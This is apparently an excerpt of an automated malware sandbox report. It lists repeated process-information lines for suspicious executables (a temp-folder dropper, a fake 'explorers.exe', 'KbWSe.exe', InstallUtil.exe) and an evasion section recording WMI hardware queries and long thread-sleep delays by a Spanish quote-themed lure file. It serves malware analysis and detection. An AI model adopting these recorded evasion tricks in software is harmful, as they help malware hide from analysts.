                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\explorers.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe TID: 5636Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe TID: 5636Thread sleep count: 46 > 30
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe TID: 3432Thread sleep count: 9483 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 2816Thread sleep count: 8822 > 30
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -22136092888451448s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -200000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99351s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99197s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99001s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -98881s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -98764s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -97333s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -97151s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -96985s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -96873s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -96760s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -96632s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -96487s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -96307s >= -30000s
